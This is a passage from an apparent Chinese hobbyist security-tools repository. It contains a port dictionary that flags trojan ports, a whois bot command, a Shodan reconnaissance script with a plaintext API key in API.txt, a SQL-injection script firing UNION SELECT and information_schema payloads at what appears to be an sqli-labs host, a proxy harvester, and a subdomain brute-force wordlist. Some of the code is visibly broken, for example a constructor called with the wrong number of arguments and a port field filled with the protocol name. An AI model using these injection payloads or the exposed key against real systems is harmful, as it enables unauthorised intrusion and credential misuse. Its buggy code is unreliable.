'MyCTS服务器端口', '5150': 'Ascend通道管理协议', 113 | '5154': 'BZFlag游戏服务器', '5190': 'America-Online(美国在线)', '5191': 'AmericaOnline1(美国在线)', 114 | '5192': 'AmericaOnline2(美国在线)', '5193': 'AmericaOnline3(美国在线)', '5222': 'Jabber客户端连接', '5225': 'HP(惠普公司)服务器', 115 | '5226': 'HP(惠普公司)', '5232': 'SGI绘图软件端口', '5250': 'i网关', '5264': '3Com网络端口1', '5265': '3Com网络端口2', 116 | '5269': 'Jabber服务器连接', '5306': 'Sun MC组', '5321': '木马Sockets de Troie开放5321端口', 117 | '5400': '木马Blade Runner开放此端口', '5401': '木马Blade Runner开放此端口', '5402': '木马Blade Runner开放此端口', '5405': '网络支持', 118 | '5409': 'Salient数据服务器', '5410': 'Salient用户管理', '5415': 'NS服务器', '5416': 'SNS网关', '5417': 'SNS代理', 119 | '5421': '网络支持2', '5423': '虚拟用户', '5427': 'SCO-PEER-TTA(Unix系统)', '5432': 'PostgreSQL数据库', 120 | '5550': '木马xtcp开放此端口', '5569': '木马Robo-Hack开放此端口', '5599': '公司远程安全安装', '5600': '公司安全管理', '5601': '公司安全代理', 121 | '5631': 'pcANYWhere(软件)数据', '5632': 'pcANYWhere(软件)数据', '5673': 'JACL消息服务器', '5675': 'V5UA应用端口', 122 | '5676': 'RA管理', '5678': '远程复制代理连接', '5679': '直接电缆连接', '5720': 'MS-执照', '5729': 'Openmail用户代理层', 123 | '5730': "Steltor's日历访问", '5731': 'netscape(网景)suiteware', '5732': 'netscape(网景)suiteware', 124 | '5742': '木马WinCrash1.03开放此端口', '5745': 'fcopy-服务器', '5746': 'fcopys-服务器', '5755': 'OpenMail(邮件服务器)桌面网关服务器', 125 | '5757': 'OpenMail(邮件服务器)X.500目录服务器', '5766': 'OpenMail (邮件服务器)NewMail服务器', 126 | '5767': 'OpenMail (邮件服务器)请求代理曾(安全)', '5768': 'OpenMail(邮件服务器) CMTS服务器', '5777': 'DALI端口', '5800': '虚拟网络计算', 127 | '5801': '虚拟网络计算', '5802': '虚拟网络计算HTTP访问, d', '5803': '虚拟网络计算HTTP访问, d', '5900': '虚拟网络计算机显示0', 128 | '5901': '虚拟网络计算机显示1', '5902': '虚拟网络计算机显示2', '5903': '虚拟网络计算机显示3', '6000': 'X Window 系统', 129 | '6001': 'X Window 服务器', '6002': 'X Window 服务器', '6003': 'X Window 服务器', '6004': 'X Window 服务器', 130 | '6005': 'X Window 服务器', '6006': 'X Window 服务器', '6007': 'X Window 服务器', '6008': 'X Window 服务器', 131 | '6009': 'X Window 服务器', '6456': 'SKIP证书发送', '6471': 'LVision许可管理器', '6505': 'BoKS管理私人端口', 132 | '6506': 'BoKS管理公共端口', '6507': 'BoKS Dir服务器,私人端口', '6508': 'BoKS Dir服务器,公共端口', '6509': 'MGCS-MFP端口', 133 | '6510': 'MCER端口', '6566': 'SANE控制端口', '6580': 'Parsec主服务器', '6581': 'Parsec对等网络', '6582': 'Parsec游戏服务器', 134 | '6588': 'AnalogX HTTP代理端口', '6631': 'Mitchell电信主机', '6667': 'Internet多线交谈', '6668': 'Internet多线交谈', 135 | '6670': '木马Deep Throat开放此端口', '6671': '木马Deep Throat 3.0开放此端口', '6699': 'Napster文件(MP3)共享服务', 136 | '6701': 'KTI/ICAD名称服务器', '6788': 'SMC软件-HTTP', '6789': 'SMC软件-HTTPS', '6841': 'Netmo软件默认开放端口', 137 | '6842': 'Netmo HTTP服务', '6883': '木马DeltaSource开放此端口', '6939': '木马Indoctrination开放此端口', 138 | '6969': '木马Gatecrasher、Priority开放此端口', '6970': 'real音频开放此端口', '7000': '木马Remote Grab开放此端口', 139 | '7002': '使用者& 组 数据库', '7003': '音量定位数据库', '7004': 'AFS/Kerberos认证服务', '7005': '音量管理服务', '7006': '错误解释服务', 140 | '7007': 'Basic监督进程', '7008': '服务器-服务器更新程序', '7009': '远程缓存管理服务', '7011': 'Talon软件发现端口', '7012': 'Talon软件引擎', 141 | '7013': 'Microtalon发现', '7014': 'Microtalon通信', '7015': 'Talon网络服务器', '7020': 'DP服务', '7021': 'DP服务管理', 142 | '7100': 'X字型服务', '7121': '虚拟原型许可证管理', '7300': '木马NetMonitor开放此端口', '7301': '木马NetMonitor开放此端口', 143 | '7306': '木马NetMonitor,NetSpy1.0开放此端口', '7307': '木马NetMonitor开放此端口', '7308': '木马NetMonitor开放此端口', 144 | '7323': 'Sygate服务器端', '7511': '木马聪明基因开放此端口', '7588': 'Sun许可证管理', '7597': '木马Quaz开放此端口', '7626': '木马冰河开放此端口', 145 | '7633': 'PMDF管理', '7674': 'iMQ SSL通道', '7675': 'iMQ通道', '7676': '木马Giscier开放此端口', '7720': 'Med图象入口', 146 | '7743': 'Sakura脚本传递协议', '7789': '木马ICKiller开放此端口', '7797': 'Propel连接器端口', '7798': 'Propel编码器端口', 147 | '8000': '腾讯QQ服务器端开放此端口', '8001': 'VCOM通道', '8007': 'Apache(类似iis)jServ协议1.x', '8008': 'HTTP Alternate', 148 | '8009': 'Apache(类似iis)JServ协议1.3', '8010': 'Wingate代理开放此端口', '8011': '木马way2.4开放此端口', '8022': 'OA-系统', 149 | '8080': 'WWW代理开放此端口', '8081': 'ICECap控制台', '8082': 'BlackIce(防止黑客软件)警报发送到此端口', '8118': 'Privoxy HTTP代理', 150 | '8121': 'Apollo数据端口', '8122': 'Apollo软件管理端口', '8181': 'Imail', '8225': '木马灰鸽子开放此端口', '8311': '木马初恋情人开放此端口', 151 | '8351': '服务器寻找', '8416': 'eSpeech Session协议', '8417': 'eSpeech RTP协议', '8473': '虚拟点对点', '8668': '网络地址转换', 152 | '8786': 'Message客户端', '8787': 'Message服务器', '8954': 'Cumulus管理端口', '9000': 'CS监听', '9001': 'ETL服务管理', 153 | '9002': '动态id验证', '9021': 'Pangolin验证', '9022': 'PrivateArk远程代理', '9023': '安全网络登陆-1', '9024': '安全网络登陆-2', 154 | '9025': '安全网络登陆-3', '9026': '安全网络登陆-4', '9101': 'Bacula控制器', '9102': 'Bacula文件后台', '9103': 'Bacula存储邮件后台', 155 | '9111': 'DragonIDS控制台', '9217': 'FSC通讯端口', '9281': '软件传送端口1', '9282': '软件传送端口2', '9346': 'C技术监听', 156 | '9400': '木马Incommand 1.0开放此端口', '9401': '木马Incommand 1.0开放此端口', '9402': '木马Incommand 1.0开放此端口', 157 | '9594': '信息系统', '9595': 'Ping Discovery服务', '9800': 'WebDav源端口', '9801': 'Sakura脚本转移协议-2', 158 | '9802': 'WebDAV Source TLS/SSL', '9872': '木马Portal of Doom开放此端口', '9873': '木马Portal of Doom开放此端口', 159 | '9874': '木马Portal of Doom开放此端口', '9875': '木马Portal of Doom开放此端口', '9899': '木马InIkiller开放此端口', '9909': '域名时间', 160 | '9911': 'SYPECom传送协议', '9989': '木马iNi-Killer开放此端口', '9990': 'OSM Applet程序服务器', '9991': 'OSM事件服务器', 161 | '10000': '网络数据管理协议', '10001': 'SCP构造端口', '10005': '安全远程登陆', '10008': 'Octopus多路器', 162 | '10067': '木马iNi-Killer开放此端口', '10113': 'NetIQ端点', '10115': 'NetIQ端点', '10116': 'NetIQVoIP鉴定器', 163 | '10167': '木马iNi-Killer开放此端口', '11000': '木马SennaSpy开放此端口', '11113': '金山词霸开放此端口', 164 | '11233': '木马Progenic trojan开放此端口', '12076': '木马Telecommando开放此端口', '12223': "木马Hack'99 KeyLogger开放此端口", 165 | '12345': '木马NetBus1.60/1.70、GabanBus开放此端口', '12346': '木马NetBus1.60/1.70、GabanBus开放此端口', 166 | '12361': '木马Whack-a-mole开放此端口', '13223': 'PowWow 客户端,是Tribal Voice的聊天程序', 167 | '13224': 'PowWow 服务器,是Tribal Voice的聊天程序', '16959': '木马Subseven开放此端口', '16969': '木马Priority开放此端口', 168 | '17027': '外向连接', '19191': '木马蓝色火焰开放此端口', '20000': '木马Millennium开放此端口', '20001': '木马Millennium开放此端口', 169 | '20034': '木马NetBus Pro开放此端口', '21554': '木马GirlFriend开放此端口', '22222': '木马Prosiak开放此端口', 170 | '23444': '木马网络公牛开放此端口', '23456': '木马Evil FTP、Ugly FTP开放此端口', '25793': 'Vocaltec地址服务器', '26262': 'K3软件-服务器', 171 | '26263': 'K3软件客户端', '26274': '木马Delta开放此端口', '27374': '木马Subseven 2.1开放此端口', '30100': '木马NetSphere开放此端口', 172 | '30129': '木马Masters Paradise开放此端口', '30303': '木马Socket23开放此端口', '30999': '木马Kuang开放此端口', 173 | '31337': '木马BO(Back orifice)开放此端口', '31338': '木马BO(Back orifice),DeepBO开放此端口', '31339': '木马NetSpy DK开放此端口', 174 | '31666': '木马BOWhack开放此端口', '31789': 'Hack-a-tack', '32770': 'sun solaris RPC服务开放此端口', 175 | '33333': '木马Prosiak开放此端口', '33434': '路由跟踪', '34324': '木马Tiny Telnet Server、BigGluck、TN开放此端口', 176 | '36865': 'KastenX软件端口', '38201': 'Galaxy7软件数据通道', '39681': 'TurboNote默认端口', '40412': '木马The Spy开放此端口', 177 | '40421': '木马Masters Paradise开放此端口', '40422': '木马Masters Paradise开放此端口', '40423': '木马Masters Paradise开放此端口', 178 | '40426': '木马Masters Paradise开放此端口', '40843': 'CSCC 防火墙', '43210': '木马SchoolBus 1.0/2.0开放此端口', 179 | '43190': 'IP-PROVISION', '44321': 'PCP服务器(pmcd)', '44322': 'PCP服务器(pmcd)代理', '44334': '微型个人防火墙端口', 180 | '44442': 'ColdFusion软件端口', '44443': 'ColdFusion软件端口', '44445': '木马Happypig开放此端口', '45576': 'E代时光专业代理开放此端口', 181 | '47262': '木马Delta开放此端口', '47624': 'Direct Play服务器', '47806': 'ALC协议', '48003': 'Nimbus网关', 182 | '50505': '木马Sockets de Troie开放此端口', '50766': '木马Fore开放此端口', '53001': '木马Remote Windows Shutdown开放此端口', 183 | '54320': '木马bo2000开放此端口', '54321': '木马SchoolBus 1.0/2.0开放此端口', '61466': '木马Telecommando开放此端口', 184 | '65000': '木马Devil 1.03开放此端口', '65301': 'PC Anywhere软件开放端口','1521':'oracle默认的端口号是1521','27017':'MongoDB默认端口','6379':'Redis默认端口','11211':'memcached'} 185 | 186 | udp = {'31': 'Masters Paradise木马', '41': 'DeepThroat木马', '53': '域名解析', '67': '动态IP服务', '68': '动态IP客户端', 187 | '135': '本地服务', '137': 'NETBIOS名称', '138': 'NETBIOS DGM服务', '139': '文件共享', '146': 'FC-Infector木马', 188 | '161': 'SNMP服务', '162': 'SNMP查询', '445': 'SMB(交换服务器消息块)', '500': 'V**密钥协商', '666': 'Bla木马', 189 | '999': 'DeepThroat木马', '1027': '灰鸽子', '1042': 'Bla木马', '1561': 'MuSka52木马', '1900': 'UPNP(通用即插即用)', 190 | '2140': 'Deep Throat木马', '2989': 'Rat木马', '3129': 'Masters Paradise木马', '3150': 'DeepThroat木马', 191 | '3700': 'Portal of Doom木马', '4000': 'QQ聊天', '4006': '灰鸽子', '5168': '高波蠕虫', '6670': 'DeepThroat木马', 192 | '6771': 'DeepThroat木马', '6970': 'ReadAudio音频数据', '8000': 'QQ聊天', '8099': 'VC远程调试', '8225': '灰鸽子', 193 | '9872': 'Portal of Doom木马', '9873': 'Portal of Doom木马', '9874': 'Portal of Doom木马', 194 | '9875': 'Portal of Doom木马', '10067': 'Portal of Doom木马', '10167': 'Portal of Doom木马', '22226': '高波蠕虫', 195 | '26274': 'Delta Source木马', '31337': 'Back-Orifice木马', '31785': 'Hack Attack木马', '31787': 'Hack Attack木马', 196 | '31788': 'Hack-A-Tack木马', '31789': 'Hack Attack木马', '31791': 'Hack Attack木马', '31792': 'Hack-A-Tack木马', 197 | '34555': 'Trin00 DDoS木马', '40422': 'Master-Paradise木马', '40423': 'Master-Paradise木马', 198 | '40425': 'Master-Paradise木马', '40426': 'Master-Paradise木马', '47262': 'Delta Source木马', 199 | '54320': 'Back-Orifice木马', '54321': 'Back-Orifice木马', '60000': 'DeepThroat木马'} 200 | 201 | from nonebot import on_command 202 | 203 | from nonebot.matcher import Matcher 204 | from nonebot.adapters import Message 205 | from nonebot.params import Arg, CommandArg, ArgPlainText 206 | 207 | ND = on_command("whois", aliases={"whois"}, priority=2, block=True) 208 | 209 | @ND.handle() 210 | async def handle_first_receive(matcher: Matcher, args: Message = CommandArg()): 211 | plain_text = args.extract_plain_text() # 首次发送命令时跟随的参数,例:/天气 上海,则args为上海 212 | if plain_text: 213 | matcher.set_arg("Name", args) # 如果用户发送了参数则直接赋值 214 | 215 | 216 | @ND.got("Name", prompt="用法:whois 域名") 217 | async def handle_city(Name: Message = Arg(), sname: str = ArgPlainText("Name")): 218 | try: 219 | 220 | await ND.send(Whois_check(sname)) 221 | except Exception as e: 222 | await ND.send("搜图插件出现故障,请联系Mangata") -------------------------------------------------------------------------------- /shodan脚本/API.txt: -------------------------------------------------------------------------------- 1 | ma8U5AiHE7bf7ESJmnQo13yoqVc5iCv0 -------------------------------------------------------------------------------- /shodan脚本/查询信息.py: -------------------------------------------------------------------------------- 1 | import shodan 2 | 3 | 4 | # API 5 | def shodan_API(): 6 | i = str(input("请输入")) 7 | # 输入API 8 | Shodan_api = 0 9 | if i == '1': 10 | API_document = open("API.txt", 'r') # 读文件 11 | Shodan_api = API_document.readline() # 读取文件的API 12 | api = shodan.Shodan(Shodan_api) 13 | API_document.close() # 关闭文件 14 | else: 15 | Shodan_api = input("请输入自己的shodan的API:") 16 | API_document = open("API.txt", 'w') 17 | API_document.write(Shodan_api) 18 | API_document.close() 19 | api = shodan.Shodan(Shodan_api) 20 | return api 21 | print(''' 22 | _ _ 23 | ___| |__ ___ __| | __ _ _ __ 24 | / __| '_ \ / _ \ / _` |/ _` | '_ \ 25 | \__ \ | | | (_) | (_| | (_| | | | | 26 | |___/_| |_|\___/ \__,_|\__,_|_| |_| 27 | 28 | * 信息收集 29 | * 1. 输入用第一次的API 30 | ''') 31 | 32 | 33 | 34 | api=shodan_API() 35 | host=str(input("请输入目标地址:")) 36 | try: 37 | resultip=api.host(host) 38 | 39 | print("IP地址是:"+resultip['ip_str']) 40 | 41 | for result in resultip['data']: 42 | 43 | print("放的端口:"+str(result['port'])+"\n使用的服务器软件:"+result['product']+'\n响应信息:'+str(result['data'])+'\n爬曲时间:'+result['timestamp']+"\n国家是:"+resultip['country_name']) 44 | print() 45 | except Exception as bc: 46 | print("只扫描web服务信息") -------------------------------------------------------------------------------- /sql注入/sql注入.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from lxml import etree 3 | import re 4 | 5 | 6 | 7 | #ORDER BY 判断列数用到的 8 | def ORDER_BY_Grinning(): 9 | # 其实可以用循环实现的,这个真的是不想思路了头大,我就这样写的简单明了了 10 | ORDER_BY_Grinning=["union%20 select 1 --+'","union%20 select 1,2--+'","union%20 select 1,2,3 --+'","union%20 select 1,2,3,4 --+'","union%20 select 1,2,3,4,5-+'","union%20 select 1,2,3,4,5,6 --+'"] 11 | return ORDER_BY_Grinning 12 | 13 | 14 | class judge_Numbers_or_characters(): 15 | def __init__(self, url,test,Grinning): 16 | self.url=url 17 | self.test=test 18 | self.Grinning = Grinning 19 | def union(self): 20 | self.statement=(self.url[:-1] +"-1"+ self.test + self.Grinning) # 拼接语句 21 | return self.statement 22 | def union2(self): 23 | self.statement = (self.url[:-1] + "-1" + self.test + self.Grinning) 24 | 25 | # ORDER BY 判断列数 26 | def ORDER_BY(url,test): 27 | ORDER_BY_=ORDER_BY_Grinning() 28 | for Grinning in range(6): 29 | print((url[:-1]+'-1'+test+ORDER_BY_[Grinning])) 30 | html = requests.get(url[:-1]+'-1'+test+ORDER_BY_[Grinning]) 31 | if html.text.find('SELECT') == -1: 32 | print("ORDER BY 判断列有:"+str(Grinning+1)+'个') 33 | Injection_statement_apostrophe(url, Grinning) 34 | 35 | def Possible_test(url,test): 36 | # 判断是否是数字还是字符 37 | statement=url+test[0]+"%20--+%20"+test[0] # 拼接 语句 ' --+ ' 38 | html = requests.get(statement) # 拼接后发起请求 39 | 40 | if html.text.find('SQL syntax') == -1: 41 | print("注入漏洞判断可能是字符号") # 判断是否是字符'号注入 42 | 43 | print("很大可能是'符号") 44 | ORDER_BY(url,test[0]) 45 | else: 46 | print("注入漏洞判断可能不是字符号") 47 | Injection_statement_number(url, test[2]) 48 | 49 | # 数字进行注入测 50 | def Injection_statement_number(url,Grinning): 51 | ORDER_BY_ = ORDER_BY_Grinning() 52 | statement=judge_Numbers_or_characters(url,ORDER_BY_[Grinning]) 53 | 54 | html = requests.get(statement.union()) # 拼接后发起请求 55 | if html.text.find('SQL syntax') == -1: 56 | html = etree.HTML(html.text) 57 | divs = html.xpath(r'//font/font/text()') # 语法 58 | for i in range(int(Grinning)): 59 | Location=re.findall(str(i+1), (" ".join(divs))) 60 | 61 | Location1=0 62 | if len(Location) ==1: 63 | 64 | print("ORDER BY 判断列页面输出用到的列在"+str(Location[0])+'个') 65 | else: 66 | print("不对") 67 | 68 | 69 | # '进行注入测试 70 | def Injection_statement_apostrophe(url,Grinning): 71 | ORDER_BY_ = ORDER_BY_Grinning() 72 | statement=judge_Numbers_or_characters(url,"'",ORDER_BY_[Grinning]) 73 | 74 | html = requests.get(statement.union()) # 拼接后发起请求 75 | if html.text.find('SQL syntax') == -1: 76 | html = etree.HTML(html.text) 77 | divs = html.xpath(r'//font/font/text()') # 语法 78 | for i in range(int(Grinning)): 79 | Location=re.findall(str(i+1), (" ".join(divs))) 80 | 81 | Location1=0 82 | if len(Location) ==1: 83 | Injection_Read_information() 84 | print("ORDER BY 判断列页面输出用到的列在"+str(Location[0])+'个') 85 | else: 86 | print("不对") 87 | 88 | def Injection_Read_information(): 89 | html = requests.get('http://192.168.125.93/Less-1/?id=-1%27%20%20union%20select%201,(select%20schema_name%20from%20information_schema.schemata%20%20%20LIMIT%200,1),3%20--+') # 拼接后发起请求 90 | html = etree.HTML(html.text) 91 | divs = html.xpath(r'//font/font/text()') # 语法 92 | print("读取当前数据库名字:"+str(divs)) 93 | def enter(): 94 | print(""" 95 | _ _ _ _ _ 96 | ___ __ _| | (_)_ __ (_) ___ ___| |_(_) ___ _ __ 97 | / __|/ _` | | | | '_ \ | |/ _ \/ __| __| |/ _ \| '_ \ 98 | \__ \ (_| | | | | | | || | __/ (__| |_| | (_) | | | | 99 | |___/\__, |_| |_|_| |_|/ |\___|\___|\__|_|\___/|_| |_| 100 | |_| |__/ 101 | 102 | *开发中。。。。 103 | """) 104 | if __name__ == '__main__': 105 | enter() 106 | url='http://192.168.125.93/Less-2/?id=2' 107 | test = ['%27', '%22',''] 108 | Possible_test(url,test) 109 | -------------------------------------------------------------------------------- /代理服务器自动化采集/采代理服务器.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import time 3 | from lxml import etree 4 | import re 5 | 6 | #添加请求头 7 | def headers_(): 8 | headers = { # 定义User-Agent请求头,用键值对的方式 9 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36", 10 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", 11 | 12 | } 13 | return headers 14 | 15 | def verify(proxies): 16 | headers = headers_() 17 | print(proxies['http']) 18 | try: 19 | html = requests.get('http://httpbin.org/get', proxies=proxies,timeout=2) 20 | 21 | print(html) 22 | # html = etree.HTML(html.text) 23 | # 24 | # IP = html.xpath(r'//th/div[@id="tab0_ip"]/text()') # 提取ip 25 | # address=html.xpath(r'//th/div[@id="tab0_address"]/text()') # 地址 26 | # print("可以用的:IP"+IP+"地址:"+address) 27 | IP=re.findall(r'\d+\.\d+\.\d+\.\d+', html.text)[0] 28 | print("这个IP可以用:"+IP) 29 | except Exception: 30 | print("这个代理不可用") 31 | # 判断代理方式 32 | def judge(ip,PORT,protocol): 33 | print("正在验证") 34 | if protocol=='HTTP': 35 | proxies = {"http": ('http://'+ip+':'+PORT)} 36 | verify(proxies) 37 | elif protocol=='SOCKS5': 38 | proxies = {"http": ('socks5://'+ip+':'+protocol)} 39 | verify(proxies) 40 | 41 | # 提取代理服务器地址和端口地方 42 | def collection(url,speed): 43 | headers = headers_() 44 | 45 | html=requests.get(url,headers=headers) 46 | html = etree.HTML(html.text) 47 | 48 | IP = html.xpath(r'//tr/td[@data-title="IP"]/text()') # 提取ip 49 | PORT = html.xpath(r'//tr/td[@data-title="PORT"]/text()') # 提取端口 50 | anonymous = html.xpath(r'//tr/td[@data-title="匿名度"]/text()') # 提取匿名程度 51 | protocol = html.xpath(r'//tr/td[@data-title="类型"]/text()') # 提取协议 52 | Location = html.xpath(r'//tr/td[@data-title="位置"]/text()') # 提取协议 53 | for i in range(len(IP)): 54 | time.sleep(speed) 55 | print("ip地址是:"+IP[i]+"|端口是"+str(PORT[i])+"\n匿名程度:"+anonymous[i]+"|用的协议"+str(protocol[i])+"|位置在:"+Location[i]) 56 | judge(IP[i],str(PORT[i]),protocol[i]) 57 | 58 | 59 | 60 | if __name__ == '__main__': 61 | print(''' 62 | ___ ____ _ _ _ _ 63 | |_ _| _ \ ___ | | | ___ ___| |_(_) ___ _ __ 64 | | || |_) | / _ \| | |/ _ \/ __| __| |/ _ \| '_ \ 65 | | || __/ | (_) | | | __/ (__| |_| | (_) | | | | 66 | |___|_| \___/|_|_|\___|\___|\__|_|\___/|_| |_| 67 | 68 | * 博客地址:www.zssnp.top 69 | * 作者:赵赛赛 70 | ''') 71 | speed=int(input("请输入采集速度:")) 72 | 73 | url='https://www.kuaidaili.com/free/' 74 | collection(url,speed) 75 | -------------------------------------------------------------------------------- /子域名探测/dns.txt: -------------------------------------------------------------------------------- 1 | www 2 | a 3 | b 4 | c 5 | d 6 | e 7 | f 8 | g 9 | h 10 | i 11 | j 12 | kl 13 | m 14 | a 15 | cs 16 | adsl 17 | afa 18 | afcn 19 | affaires-etrangeres 20 | affaires-sociales 21 | affairesetrangeres 22 | affairessociales 23 | afigp 24 | afnorth 25 | africa 26 | afs-nafsd 27 | afsca 28 | afsca-favv 29 | afsca2006 30 | afsouth 31 | agencedespensions 32 | agent 33 | ags3 34 | aigpol 35 | aiiz 36 | air 37 | aircraft 38 | airiz 39 | airn 40 | airramstein 41 | airtest 42 | alaune 43 | albert-2 44 | albert-II 45 | albert-deux 46 | albert-twee 47 | albert2 48 | albertdeux 49 | albertii 50 | alberttwee 51 | allocationsfamiliales 52 | ambtenaar 53 | ambtenaren 54 | ambtenarenzaken 55 | america 56 | animal-diseases 57 | animaldiseases 58 | antartica 59 | anthrax 60 | antiracisme 61 | aoot-servers 62 | aoss 63 | ap 64 | apod-kaia 65 | apps 66 | arbeid 67 | archive 68 | arcweb 69 | arp 70 | arrc 71 | arthur 72 | asc 73 | asia 74 | atlantic 75 | attest 76 | attest-acc 77 | attest-test 78 | auditinternetresorerie 79 | australia 80 | av 81 | avatar 82 | b-fast 83 | b-servers 84 | bacillusanthracis 85 | backup 86 | badc 87 | banquecarrefour 88 | bart 89 | bc 90 | bc1 91 | bce 92 | bcss 93 | bcss-ksz 94 | bdsrvns01 95 | be 96 | belac 97 | beldonor 98 | belgacom 99 | belgica 100 | belgie 101 | belgien 102 | belgique 103 | belgium 104 | belgoeurop 105 | belgopocket 106 | bellis 107 | belmed 108 | belmed-acc 109 | belmed-dev 110 | belspo 111 | beroepsziekten 112 | beschaeftigung 113 | bestat 114 | beta 115 | betula 116 | bfab 117 | bfast 118 | bihdr 119 | bijzonderbeschermingsfonds 120 | binnenland 121 | binnenlandse-zaken 122 | binnenlandsezaken 123 | biodiversity 124 | biosafety 125 | birb 126 | birbdev 127 | birbtest 128 | blog 129 | boite-postale 130 | boitepostale 131 | boot-servers 132 | border1 133 | br 134 | bram 135 | brite 136 | britetw 137 | britetwais 138 | bse 139 | budget 140 | budget-federal 141 | budgetenbeheerscontrole 142 | budgetfederal 143 | bugs 144 | buildingsagency 145 | buitenland 146 | buitenlandse-handel 147 | buitenlandse-zaken 148 | buitenlandsehandel 149 | buitenlandsezaken 150 | c 151 | caami 152 | caami-hziv 153 | cabinet 154 | cadps-login 155 | cadps-nt 156 | cadpsdev-login 157 | cadpsdev-nt 158 | caoc-find 159 | caoc1 160 | caoc5 161 | caoc7 162 | caoc8 163 | caocbalk 164 | caocf 165 | caocpr 166 | cap 167 | capac 168 | capac-hvw 169 | capelo 170 | captest 171 | ccdd 172 | ccdd-ccdv 173 | ccdv 174 | ccecrb 175 | ccvd 176 | cdvupensioenen 177 | census 178 | census2011 179 | centredexpertise 180 | cepma 181 | cerva 182 | cfdd 183 | cfdd-frdo 184 | cgs2 185 | cgs4 186 | cgs5 187 | channel 188 | cidd 189 | cidh 190 | cimicgs 191 | cimire 192 | cipal 193 | cisgr 194 | cisteam1 195 | cisteam3 196 | citrix 197 | civielebescherming 198 | civilservice 199 | class 200 | classical-swine-fever 201 | classicalswinefever 202 | claude 203 | cld 204 | client 205 | climat 206 | climateregistry 207 | clo 208 | clubdevenise 209 | clubofvenice 210 | cmlag 211 | cmn-bw-bru 212 | cnrcsa 213 | coda 214 | coda-cerva 215 | codacerva 216 | coedat 217 | coeurnelle-mail 218 | combuysse 219 | cominformatics 220 | commerce-exterieur 221 | commerceexterieur 222 | commissionjeuxhasard 223 | communication 224 | communications 225 | commz 226 | conformity 227 | conseil-etat 228 | conseildetat 229 | consetat 230 | conventioneu 231 | conventionue 232 | cooperation 233 | coot-servers 234 | copieconforme 235 | councilofstate 236 | cpas 237 | cprr 238 | csf 239 | csipme 240 | csl-uncl-pdc 241 | cslo 242 | cspm 243 | ctc 244 | customs 245 | cvts 246 | cwid 247 | d 248 | dau 249 | dav 250 | davo 251 | deambachten 252 | deambachten-acc 253 | debtagency 254 | demadelief 255 | developpement 256 | dfi 257 | di 258 | diehandwerker 259 | diehandwerker-acc 260 | dienstenrichtlijn 261 | dienstleistungsrichtlinie 262 | dierenziekten 263 | dioxin 264 | dioxine 265 | dioxines 266 | diplobel 267 | diplomatie 268 | directiveservices 269 | directory 270 | dmz 271 | dmz-2 272 | dns 273 | dns0 274 | dns1 275 | dns1w 276 | dns2 277 | dns3 278 | dnsintera 279 | dnsinterb 280 | dnsmaster 281 | docufin 282 | documentadministratifunique 283 | dofi 284 | doot-servers 285 | dosz 286 | dosz-ossom 287 | doszserver 288 | doteu 289 | drupal 290 | dummy 291 | dwti 292 | e 293 | e2e 294 | e3a 295 | ebr 296 | ebr-acc 297 | ecodata 298 | ecodoc 299 | ecolabel 300 | economie 301 | economie2 302 | economiesociale 303 | ecops 304 | ed 305 | ed-dau 306 | edateng 307 | edatenq 308 | edatenq-acc 309 | eddau 310 | eensluidendverklaring 311 | ehealth 312 | ehealth-it 313 | eiss 314 | eisz 315 | eiz7iu9g 316 | election 317 | electionresults 318 | elections 319 | electionssociales 320 | elisabeth 321 | emc 322 | emetro 323 | emetro-acc 324 | emploi 325 | employment 326 | energie 327 | eng-tx 328 | engtx2 329 | enigdocument 330 | enquete 331 | environment 332 | eoot-servers 333 | epatras 334 | eportal 335 | era-nova 336 | eranova 337 | ere-nova 338 | erenova 339 | erhebung 340 | es 341 | esb 342 | esp 343 | espacenet 344 | etudiantautravail 345 | eu2010 346 | euconventie 347 | euconvention 348 | eudir 349 | eurdir 350 | euro 351 | europe 352 | exbmy 353 | exc 354 | exctest 355 | ext 356 | ext1 357 | ext2 358 | extern 359 | extranet 360 | f 361 | fanc 362 | fanc2 363 | fao 364 | faofat 365 | fat 366 | fatfao 367 | favv 368 | favv-afsca 369 | favv2006 370 | fbk 371 | fbz 372 | fbz-fmp 373 | fchd 374 | fcmd 375 | fdsrvns02 376 | fedasil 377 | fedasilantartica 378 | fedict 379 | fedpol 380 | fedpolfed 381 | femmeetpension 382 | fernandez 383 | ffe 384 | file 385 | fin 386 | finance 387 | finances 388 | financien 389 | finanzen 390 | finderup 391 | finform 392 | fisconet 393 | fiscus 394 | flr-stat 395 | fmp 396 | fmp-fbz 397 | fonction-publique 398 | fonctionnaire 399 | fonctionnaires 400 | fonctionpublique 401 | fondsdevieillissement 402 | fondsspecialdeprotection 403 | foodsafety 404 | foot-servers 405 | foracs 406 | forensic 407 | forensics 408 | forfeit 409 | form 410 | fortar3 411 | fortar3-acc 412 | forum 413 | forums 414 | fr 415 | fra 416 | frdo 417 | frdo-cfdd 418 | fs 419 | fs1 420 | fso 421 | fsoffe 422 | ftp 423 | ftps 424 | ftpserver 425 | fugazi 426 | fytoweb 427 | g 428 | g01 429 | g02 430 | galahad 431 | gamingcommission 432 | gas2020gaz 433 | gaz2020 434 | ge-nl 435 | geh\228lter 436 | gehaelter 437 | gehalter 438 | gemsz 439 | genootschap 440 | gesundheit 441 | gezondheid 442 | gfmd-fmmd 443 | gimli 444 | globalisatindebate 445 | goot-servers 446 | gr 447 | grc 448 | griep 449 | grippe 450 | grippeaviaire 451 | guideweb 452 | gwydion 453 | handicap 454 | haw 455 | hawk 456 | headlines 457 | health 458 | hermes 459 | hfa 460 | hkiv 461 | hms 462 | hog-cholera 463 | hogcholera 464 | hoot-servers 465 | horizon 466 | host 467 | hq 468 | hrf 469 | hrf-m 470 | hrf-mobile 471 | hrf-mobile-main 472 | hrf-stat 473 | hrf-static 474 | hrfd 475 | hrfd-main 476 | hrfl 477 | hrzkmo 478 | http 479 | https 480 | hvkz 481 | hvkz-cspm 482 | hvw 483 | hvw-capac 484 | hziv 485 | hziv-caami 486 | ia 487 | ib 488 | ibz 489 | ibzbb 490 | ibzdgip 491 | ibzkcl 492 | icdo 493 | ichr 494 | icn-inr 495 | icops 496 | ict-ssl 497 | ictc 498 | ictctest 499 | icte 500 | ida 501 | idav 502 | ids 503 | iefa 504 | iefh 505 | ies 506 | iev 507 | iev-ivk 508 | ievivk 509 | 